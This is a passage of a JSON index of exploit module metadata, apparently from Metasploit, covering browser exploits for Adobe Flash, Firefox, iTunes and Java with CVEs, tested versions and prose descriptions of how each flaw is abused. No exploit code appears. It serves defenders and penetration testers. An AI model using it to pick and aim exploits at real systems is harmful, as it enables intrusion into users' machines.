"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/adobe_flash_hacking_team_uaf": {
"name": "Adobe Flash Player ByteArray Use After Free",
"full_name": "exploit/multi/browser/adobe_flash_hacking_team_uaf",
"rank": 500,
"disclosure_date": "2015-07-06",
"type": "exploit",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits an use after free on Adobe Flash Player. The vulnerability,\n discovered by Hacking Team and made public as part of the July 2015 data leak, was\n described as an Use After Free while handling ByteArray objects. This module has\n been tested successfully on:\n\n Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194,\n Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194,\n Windows 8.1 (32-bit), IE11 and Adobe Flash 18.0.0.194,\n Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194, and\n Linux Mint \"Rebecca\" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468.",
"references": [
"CVE-2015-5119",
"URL-https://helpx.adobe.com/security/products/flash-player/apsa15-03.html",
"URL-http://blog.trendmicro.com/trendlabs-security-intelligence/unpatched-flash-player-flaws-more-pocs-found-in-hacking-team-leak/",
"URL-https://twitter.com/w3bd3vil/status/618168863708962816"
],
"platform": "Linux,Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows",
"Linux"
],
"mod_time": "2018-08-27 13:11:22 +0000",
"path": "/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb",
"is_install_path": true,
"ref_name": "multi/browser/adobe_flash_hacking_team_uaf",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"0DayFlush"
]
}
},
"exploit_multi/browser/adobe_flash_nellymoser_bof": {
"name": "Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow",
"full_name": "exploit/multi/browser/adobe_flash_nellymoser_bof",
"rank": 500,
"disclosure_date": "2015-06-23",
"type": "exploit",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a buffer overflow on Adobe Flash Player when handling nellymoser\n encoded audio inside a FLV video, as exploited in the wild on June 2015. This module\n has been tested successfully on:\n\n Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.160,\n Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.160,\n Windows 8.1, Firefox 38.0.5 and Adobe Flash 18.0.0.160,\n Linux Mint \"Rebecca\" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.466, and\n Ubuntu 14.04.2 LTS, Firefox 35.01, and Adobe Flash 11.2.202.466.\n\n Note that this exploit is effective against both CVE-2015-3113 and the\n earlier CVE-2015-3043, since CVE-2015-3113 is effectively a regression\n to the same root cause as CVE-2015-3043.",
"references": [
"CVE-2015-3043",
"CVE-2015-3113",
"URL-https://helpx.adobe.com/security/products/flash-player/apsb15-06.html",
"URL-https://helpx.adobe.com/security/products/flash-player/apsb15-14.html",
"URL-http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-zero-day-shares-same-root-cause-as-older-flaws/",
"URL-http://malware.dontneedcoffee.com/2015/06/cve-2015-3113-flash-up-to-1800160-and.html",
"URL-http://bobao.360.cn/learning/detail/357.html"
],
"platform": "Linux,Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows",
"Linux"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb",
"is_install_path": true,
"ref_name": "multi/browser/adobe_flash_nellymoser_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/adobe_flash_net_connection_confusion": {
"name": "Adobe Flash Player NetConnection Type Confusion",
"full_name": "exploit/multi/browser/adobe_flash_net_connection_confusion",
"rank": 500,
"disclosure_date": "2015-03-12",
"type": "exploit",
"author": [
"Natalie Silvanovich",
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a type confusion vulnerability in the NetConnection class on\n Adobe Flash Player. When using a correct memory layout this vulnerability allows\n to corrupt arbitrary memory. It can be used to overwrite dangerous objects, like\n vectors, and ultimately accomplish remote code execution. This module has been tested\n successfully on:\n * Windows 7 SP1 (32-bit), IE 8, IE11 and Adobe Flash 16.0.0.305.\n * Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 16.0.0.305.\n * Windows 8.1, Firefox 38.0.5 and Adobe Flash 16.0.0.305.\n * Linux Mint \"Rebecca\" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.424.\n * Ubuntu 14.04.2 LTS, Firefox 33.0 and Adobe Flash 11.2.202.442.",
"references": [
"CVE-2015-0336",
"URL-https://helpx.adobe.com/security/products/flash-player/apsb15-05.html",
"URL-http://googleprojectzero.blogspot.com/2015/04/a-tale-of-two-exploits.html",
"URL-http://malware.dontneedcoffee.com/2015/03/cve-2015-0336-flash-up-to-1600305-and.html",
"URL-https://www.fireeye.com/blog/threat-research/2015/03/cve-2015-0336_nuclea.html",
"URL-https://blog.malwarebytes.org/exploits-2/2015/03/nuclear-ek-leverages-recently-patched-flash-vulnerability/"
],
"platform": "Linux,Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows",
"Linux"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb",
"is_install_path": true,
"ref_name": "multi/browser/adobe_flash_net_connection_confusion",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/adobe_flash_opaque_background_uaf": {
"name": "Adobe Flash opaqueBackground Use After Free",
"full_name": "exploit/multi/browser/adobe_flash_opaque_background_uaf",
"rank": 500,
"disclosure_date": "2015-07-06",
"type": "exploit",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits an use after free on Adobe Flash Player. The vulnerability,\n discovered by Hacking Team and made public as part of the July 2015 data leak, was\n described as an Use After Free while handling the opaqueBackground property\n 7 setter of the flash.display.DisplayObject class. This module is an early release\n tested on:\n\n Windows XP SP3, IE8 and Flash 18.0.0.194,\n Windows XP SP3, IE 8 and Flash 18.0.0.203,\n Windows XP SP3, Firefox and Flash 18.0.0.203,\n Windows Vista SP2 + IE 9 and Flash 18.0.0.203,\n Windows Vista SP2 + Firefox 39.0 and Flash 18.0.0.203,\n Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.203,\n Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194,\n Windows 7 SP1 (32-bit), IE9 and Adobe Flash 18.0.0.203,\n Windows 7 SP1 (32-bit), Firefox and Adobe Flash 18.0.0.194,\n Windows 8.1 (32-bit), IE11 and Adobe Flash 18.0.0.194,\n windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.203,\n Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.160 and\n Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194",
"references": [
"CVE-2015-5122",
"URL-https://www.fireeye.com/blog/threat-research/2015/07/cve-2015-5122_-_seco.html",
"URL-https://helpx.adobe.com/security/products/flash-player/apsa15-04.html",
"URL-https://helpx.adobe.com/security/products/flash-player/apsb15-18.html"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows"
],
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb",
"is_install_path": true,
"ref_name": "multi/browser/adobe_flash_opaque_background_uaf",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/adobe_flash_pixel_bender_bof": {
"name": "Adobe Flash Player Shader Buffer Overflow",
"full_name": "exploit/multi/browser/adobe_flash_pixel_bender_bof",
"rank": 500,
"disclosure_date": "2014-04-28",
"type": "exploit",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a buffer overflow vulnerability in Adobe Flash Player. The\n vulnerability occurs in the flash.Display.Shader class, when setting specially\n crafted data as its bytecode, as exploited in the wild in April 2014. This module\n has been tested successfully on the following operating systems and Flash versions:\n\n Windows 7 SP1, IE 8 to IE 11 with Flash 13.0.0.182,\n Windows 7 SP1, Firefox 38.0.5, Flash 11.7.700.275 and Adobe Flash 13.0.0.182,\n Windows 8.1, Firefox 38.0.5 and Adobe Flash 13.0.0.182,\n Linux Mint \"Rebecca\" (32 bit), Firefox 33.0 and Adobe Flash 11.2.202.350",
"references": [
"CVE-2014-0515",
"BID-67092",
"URL-http://helpx.adobe.com/security/products/flash-player/apsb14-13.html",
"URL-http://www.securelist.com/en/blog/8212/New_Flash_Player_0_day_CVE_2014_0515_used_in_watering_hole_attacks",
"URL-http://blog.trendmicro.com/trendlabs-security-intelligence/analyzing-cve-2014-0515-the-recent-flash-zero-day/"
],
"platform": "Linux,Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows",
"Linux"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/adobe_flash_pixel_bender_bof.rb",
"is_install_path": true,
"ref_name": "multi/browser/adobe_flash_pixel_bender_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/adobe_flash_shader_drawing_fill": {
"name": "Adobe Flash Player Drawing Fill Shader Memory Corruption",
"full_name": "exploit/multi/browser/adobe_flash_shader_drawing_fill",
"rank": 500,
"disclosure_date": "2015-05-12",
"type": "exploit",
"author": [
"Chris Evans",
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a memory corruption happening when applying a Shader as a drawing fill\n as exploited in the wild on June 2015. This module has been tested successfully on:\n\n Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.188,\n Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.188,\n Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.188, and\n Linux Mint \"Rebecca\" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.460.",
"references": [
"CVE-2015-3105",
"URL-https://helpx.adobe.com/security/products/flash-player/apsb15-11.html",
"URL-http://blog.trendmicro.com/trendlabs-security-intelligence/magnitude-exploit-kit-uses-newly-patched-adobe-vulnerability-us-canada-and-uk-are-most-at-risk/",
"URL-http://malware.dontneedcoffee.com/2015/06/cve-2015-3105-flash-up-to-1700188-and.html",
"URL-http://help.adobe.com/en_US/as3/dev/WSFDA04BAE-F6BC-43d9-BD9C-08D39CA22086.html"
],
"platform": "Linux,Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows",
"Linux"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/adobe_flash_shader_drawing_fill.rb",
"is_install_path": true,
"ref_name": "multi/browser/adobe_flash_shader_drawing_fill",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/adobe_flash_shader_job_overflow": {
"name": "Adobe Flash Player ShaderJob Buffer Overflow",
"full_name": "exploit/multi/browser/adobe_flash_shader_job_overflow",
"rank": 500,
"disclosure_date": "2015-05-12",
"type": "exploit",
"author": [
"Chris Evans",
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a buffer overflow vulnerability related to the ShaderJob workings on\n Adobe Flash Player. The vulnerability happens when trying to apply a Shader setting up the\n same Bitmap object as src and destination of the ShaderJob. Modifying the \"width\" attribute\n of the ShaderJob after starting the job it's possible to create a buffer overflow condition\n where the size of the destination buffer and the length of the copy are controlled. This\n module has been tested successfully on:\n\n Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.169,\n Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.169,\n Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.169, and\n Linux Mint \"Rebecca\" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.457.",
"references": [
"CVE-2015-3090",
"URL-https://helpx.adobe.com/security/products/flash-player/apsb15-09.html",
"URL-https://www.fireeye.com/blog/threat-research/2015/05/angler_ek_exploiting.html",
"URL-http://malware.dontneedcoffee.com/2015/05/cve-2015-3090-flash-up-to-1700169-and.html",
"URL-http://www.brooksandrus.com/blog/2009/03/11/bilinear-resampling-with-flash-player-and-pixel-bender/"
],
"platform": "Linux,Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows",
"Linux"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/adobe_flash_shader_job_overflow.rb",
"is_install_path": true,
"ref_name": "multi/browser/adobe_flash_shader_job_overflow",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/adobe_flash_uncompress_zlib_uaf": {
"name": "Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free",
"full_name": "exploit/multi/browser/adobe_flash_uncompress_zlib_uaf",
"rank": 500,
"disclosure_date": "2014-04-28",
"type": "exploit",
"author": [
"Unknown",
"hdarwin",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a use after free vulnerability in Adobe Flash Player. The\n vulnerability occurs in the ByteArray::UncompressViaZlibVariant method, when trying\n to uncompress() a malformed byte stream. This module has been tested successfully\n on:\n * Windows 7 SP1 (32 bits), IE 8 to IE 11 and Flash 16.0.0.287, 16.0.0.257 and 16.0.0.235.\n * Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 16.0.0.287.\n * Windows 8.1, Firefox 38.0.5 and Adobe Flash 16.0.0.305.\n * Linux Mint \"Rebecca\" (32 bits), Firefox 33.0 and Flash 11.2.202.424.",
"references": [
"CVE-2015-0311",
"URL-https://helpx.adobe.com/security/products/flash-player/apsa15-01.html",
"URL-http://blog.hacklab.kr/flash-cve-2015-0311-%EB%B6%84%EC%84%9D/",
"URL-http://blog.coresecurity.com/2015/03/04/exploiting-cve-2015-0311-a-use-after-free-in-adobe-flash-player/"
],
"platform": "Linux,Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows",
"Linux"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb",
"is_install_path": true,
"ref_name": "multi/browser/adobe_flash_uncompress_zlib_uaf",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/firefox_escape_retval": {
"name": "Firefox 3.5 escape() Return Value Memory Corruption",
"full_name": "exploit/multi/browser/firefox_escape_retval",
"rank": 300,
"disclosure_date": "2009-07-13",
"type": "exploit",
"author": [
"Simon Berry-Byrne <x00050876@itnet.ie>",
"hdm <x@hdm.io>"
],
"description": "This module exploits a memory corruption vulnerability in the Mozilla\n Firefox browser. This flaw occurs when a bug in the javascript interpreter\n fails to preserve the return value of the escape() function and results in\n uninitialized memory being used instead. This module has only been tested\n on Windows, but should work on other platforms as well with the current\n targets.",
"references": [
"CVE-2009-2477",
"OSVDB-55846",
"BID-35660",
"URL-https://bugzilla.mozilla.org/show_bug.cgi?id=503286"
],
"platform": "OSX,Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Firefox 3.5.0 on Windows XP SP0-SP3",
"Firefox 3.5.0 on Mac OS X 10.5.7 (Intel)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/firefox_escape_retval.rb",
"is_install_path": true,
"ref_name": "multi/browser/firefox_escape_retval",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/firefox_pdfjs_privilege_escalation": {
"name": "Firefox PDF.js Privileged Javascript Injection",
"full_name": "exploit/multi/browser/firefox_pdfjs_privilege_escalation",
"rank": 0,
"disclosure_date": "2015-03-31",
"type": "exploit",
"author": [
"Unknown",
"Marius Mlynski",
"joev <joev@metasploit.com>"
],
"description": "This module gains remote code execution on Firefox 35-36 by abusing a\n privilege escalation bug in resource:// URIs. PDF.js is used to exploit\n the bug. This exploit requires the user to click anywhere on the page to\n trigger the vulnerability.",
"references": [
"CVE-2015-0816",
"CVE-2015-0802"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal (Javascript XPCOM Shell)",
"Native Payload"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/firefox_pdfjs_privilege_escalation.rb",
"is_install_path": true,
"ref_name": "multi/browser/firefox_pdfjs_privilege_escalation",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/firefox_proto_crmfrequest": {
"name": "Firefox 5.0 - 15.0.1 __exposedProps__ XCS Code Execution",
"full_name": "exploit/multi/browser/firefox_proto_crmfrequest",
"rank": 600,
"disclosure_date": "2013-08-06",
"type": "exploit",
"author": [
"Mariusz Mlynski",
"moz_bug_r_a4",
"joev <joev@metasploit.com>"
],
"description": "On versions of Firefox from 5.0 to 15.0.1, the InstallTrigger global, when given\n invalid input, would throw an exception that did not have an __exposedProps__\n property set. By re-setting this property on the exception object's prototype,\n the chrome-based defineProperty method is made available.\n\n With the defineProperty method, functions belonging to window and document can be\n overridden with a function that gets called from chrome-privileged context. From here,\n another vulnerability in the crypto.generateCRMFRequest function is used to \"peek\"\n into the context's private scope. Since the window does not have a chrome:// URL,\n the insecure parts of Components.classes are not available, so instead the AddonManager\n API is invoked to silently install a malicious plugin.",
"references": [
"CVE-2012-3993",
"URL-https://bugzilla.mozilla.org/show_bug.cgi?id=768101",
"CVE-2013-1710"
],
"platform": "Java,Linux,OSX,Solaris,Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal (Javascript XPCOM Shell)",
"Native Payload"
],
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb",
"is_install_path": true,
"ref_name": "multi/browser/firefox_proto_crmfrequest",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/firefox_proxy_prototype": {
"name": "Firefox Proxy Prototype Privileged Javascript Injection",
"full_name": "exploit/multi/browser/firefox_proxy_prototype",
"rank": 0,
"disclosure_date": "2014-01-20",
"type": "exploit",
"author": [
"joev <joev@metasploit.com>"
],
"description": "This exploit gains remote code execution on Firefox 31-34 by abusing a bug in the XPConnect\n component and gaining a reference to the privileged chrome:// window. This exploit\n requires the user to click anywhere on the page to trigger the vulnerability.",
"references": [
"CVE-2014-8636",
"CVE-2015-0802",
"URL-https://bugzilla.mozilla.org/show_bug.cgi?id=1120261",
"URL-https://community.rapid7.com/community/metasploit/blog/2015/03/23/r7-2015-04-disclosure-mozilla-firefox-proxy-prototype-rce-cve-2014-8636"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal (Javascript XPCOM Shell)",
"Native Payload"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/firefox_proxy_prototype.rb",
"is_install_path": true,
"ref_name": "multi/browser/firefox_proxy_prototype",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/firefox_queryinterface": {
"name": "Firefox location.QueryInterface() Code Execution",
"full_name": "exploit/multi/browser/firefox_queryinterface",
"rank": 300,
"disclosure_date": "2006-02-02",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a code execution vulnerability in the Mozilla\n Firefox browser. To reliably exploit this vulnerability, we need to fill\n almost a gigabyte of memory with our nop sled and payload. This module has\n been tested on OS X 10.3 with the stock Firefox 1.5.0 package.",
"references": [
"CVE-2006-0295",
"OSVDB-22893",
"BID-16476",
"URL-http://www.mozilla.org/security/announce/mfsa2006-04.html"
],
"platform": "Linux,OSX",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Firefox 1.5.0.0 Mac OS X",
"Firefox 1.5.0.0 Linux"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/firefox_queryinterface.rb",
"is_install_path": true,
"ref_name": "multi/browser/firefox_queryinterface",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/firefox_svg_plugin": {
"name": "Firefox 17.0.1 Flash Privileged Code Injection",
"full_name": "exploit/multi/browser/firefox_svg_plugin",
"rank": 600,
"disclosure_date": "2013-01-08",
"type": "exploit",
"author": [
"Marius Mlynski",
"joev <joev@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This exploit gains remote code execution on Firefox 17 and 17.0.1, provided\n the user has installed Flash. No memory corruption is used.\n\n First, a Flash object is cloned into the anonymous content of the SVG\n \"use\" element in the <body> (CVE-2013-0758). From there, the Flash object\n can navigate a child frame to a URL in the chrome:// scheme.\n\n Then a separate exploit (CVE-2013-0757) is used to bypass the security wrapper\n around the child frame's window reference and inject code into the chrome://\n context. Once we have injection into the chrome execution context, we can write\n the payload to disk, chmod it (if posix), and then execute.\n\n Note: Flash is used here to trigger the exploit but any Firefox plugin\n with script access should be able to trigger it.",
"references": [
"CVE-2013-0758",
"CVE-2013-0757",
"OSVDB-89019",
"OSVDB-89020",
"URL-http://www.mozilla.org/security/announce/2013/mfsa2013-15.html",
"URL-https://bugzilla.mozilla.org/show_bug.cgi?id=813906"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal (Javascript XPCOM Shell)",
"Native Payload"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/firefox_svg_plugin.rb",
"is_install_path": true,
"ref_name": "multi/browser/firefox_svg_plugin",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/firefox_tostring_console_injection": {
"name": "Firefox toString console.time Privileged Javascript Injection",
"full_name": "exploit/multi/browser/firefox_tostring_console_injection",
"rank": 600,
"disclosure_date": "2013-05-14",
"type": "exploit",
"author": [
"moz_bug_r_a4",
"Cody Crews",
"joev <joev@metasploit.com>"
],
"description": "This exploit gains remote code execution on Firefox 15-22 by abusing two separate\n Javascript-related vulnerabilities to ultimately inject malicious Javascript code\n into a context running with chrome:// privileges.",
"references": [
"CVE-2013-1710"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal (Javascript XPCOM Shell)",
"Native Payload"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/firefox_tostring_console_injection.rb",
"is_install_path": true,
"ref_name": "multi/browser/firefox_tostring_console_injection",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/firefox_webidl_injection": {
"name": "Firefox WebIDL Privileged Javascript Injection",
"full_name": "exploit/multi/browser/firefox_webidl_injection",
"rank": 600,
"disclosure_date": "2014-03-17",
"type": "exploit",
"author": [
"Marius Mlynski",
"joev <joev@metasploit.com>"
],
"description": "This exploit gains remote code execution on Firefox 22-27 by abusing two\n separate privilege escalation vulnerabilities in Firefox's Javascript\n APIs.",
"references": [
"CVE-2014-1510",
"CVE-2014-1511"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal (Javascript XPCOM Shell)",
"Native Payload"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/firefox_webidl_injection.rb",
"is_install_path": true,
"ref_name": "multi/browser/firefox_webidl_injection",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/firefox_xpi_bootstrapped_addon": {
"name": "Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution",
"full_name": "exploit/multi/browser/firefox_xpi_bootstrapped_addon",
"rank": 600,
"disclosure_date": "2007-06-27",
"type": "exploit",
"author": [
"mihi",
"joev <joev@metasploit.com>"
],
"description": "This exploit dynamically creates a .xpi addon file.\n The resulting bootstrapped Firefox addon is presented to\n the victim via a web page. The victim's Firefox browser\n will pop a dialog asking if they trust the addon.\n\n Once the user clicks \"install\", the addon is installed and\n executes the payload with full user permissions. As of Firefox\n 4, this will work without a restart as the addon is marked to\n be \"bootstrapped\". As the addon will execute the payload after\n each Firefox restart, an option can be given to automatically\n uninstall the addon once the payload has been executed.",
"references": [
"URL-https://developer.mozilla.org/en/Extensions/Bootstrapped_extensions",
"URL-http://dvlabs.tippingpoint.com/blog/2007/06/27/xpi-the-next-malware-vector"
],
"platform": "Java,Linux,OSX,Solaris,Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal (Javascript XPCOM Shell)",
"Native Payload"
],
"mod_time": "2017-08-30 23:16:46 +0000",
"path": "/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb",
"is_install_path": true,
"ref_name": "multi/browser/firefox_xpi_bootstrapped_addon",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/itms_overflow": {
"name": "Apple OS X iTunes 8.1.1 ITMS Overflow",
"full_name": "exploit/multi/browser/itms_overflow",
"rank": 500,
"disclosure_date": "2009-06-01",
"type": "exploit",
"author": [
"Will Drewry <redpig@dataspill.org>"
],
"description": "This modules exploits a stack-based buffer overflow in iTunes\n itms:// URL parsing. It is accessible from the browser and\n in Safari, itms urls will be opened in iTunes automatically.\n Because iTunes is multithreaded, only vfork-based payloads should\n be used.",
"references": [
"CVE-2009-0950",
"OSVDB-54833",
"URL-http://support.apple.com/kb/HT3592",
"URL-http://redpig.dataspill.org/2009/05/drive-by-attack-for-itunes-811.html"
],
"platform": "OSX",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"OS X"
],
"mod_time": "2017-08-30 23:16:46 +0000",
"path": "/modules/exploits/multi/browser/itms_overflow.rb",
"is_install_path": true,
"ref_name": "multi/browser/itms_overflow",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/java_atomicreferencearray": {
"name": "Java AtomicReferenceArray Type Violation Vulnerability",
"full_name": "exploit/multi/browser/java_atomicreferencearray",
"rank": 600,
"disclosure_date": "2012-02-14",
"type": "exploit",
"author": [
"Jeroen Frijters",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>",
"egypt <egypt@metasploit.com>"
],
"description": "This module exploits a vulnerability due to the fact that\n AtomicReferenceArray uses the Unsafe class to store a reference in an\n array directly, which may violate type safety if not used properly.\n This allows a way to escape the JRE sandbox, and load additional classes\n in order to perform malicious operations.",
"references": [
"CVE-2012-0507",
"OSVDB-80724",
"BID-52161",
"URL-http://weblog.ikvm.net/PermaLink.aspx?guid=cd48169a-9405-4f63-9087-798c4a1866d3",
"URL-http://blogs.technet.com/b/mmpc/archive/2012/03/20/an-interesting-case-of-jre-sandbox-breach-cve-2012-0507.aspx",
"URL-http://schierlm.users.sourceforge.net/TypeConfusion.html",
"URL-https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-0507",
"URL-https://community.rapid7.com/community/metasploit/blog/2012/03/29/cve-2012-0507--java-strikes-again"
],
"platform": "Java,Linux,OSX,Solaris,Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Generic (Java Payload)",
"Windows x86 (Native Payload)",
"Mac OS X PPC (Native Payload)",
"Mac OS X x86 (Native Payload)",
"Linux x86 (Native Payload)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/java_atomicreferencearray.rb",
"is_install_path": true,
"ref_name": "multi/browser/java_atomicreferencearray",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/java_calendar_deserialize": {
"name": "Sun Java Calendar Deserialization Privilege Escalation",
"full_name": "exploit/multi/browser/java_calendar_deserialize",
"rank": 600,
"disclosure_date": "2008-12-03",
"type": "exploit",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>"
],
"description": "This module exploits a flaw in the deserialization of Calendar objects in the Sun JVM.\n\n The payload can be either a native payload which is generated as an executable and\n dropped/executed on the target or a shell from within the Java applet in the target browser.\n\n The affected Java versions are JDK and JRE 6 Update 10 and earlier, JDK and JRE 5.0 Update 16\n and earlier, SDK and JRE 1.4.2_18 and earlier (SDK and JRE 1.3.1 are not affected).",
"references": [
"CVE-2008-5353",
"OSVDB-50500",
"URL-http://slightlyrandombrokenthoughts.blogspot.com/2008/12/calendar-bug.html",
"URL-http://landonf.bikemonkey.org/code/macosx/CVE-2008-5353.20090519.html",
"URL-http://blog.cr0.org/2009/05/write-once-own-everyone.html"
],
"platform": "Linux,OSX,Solaris,Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Generic (Java Payload)",
"Windows x86 (Native Payload)",
"Mac OS X PPC (Native Payload)",
"Mac OS X x86 (Native Payload)",
"Linux x86 (Native Payload)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/java_calendar_deserialize.rb",
"is_install_path": true,
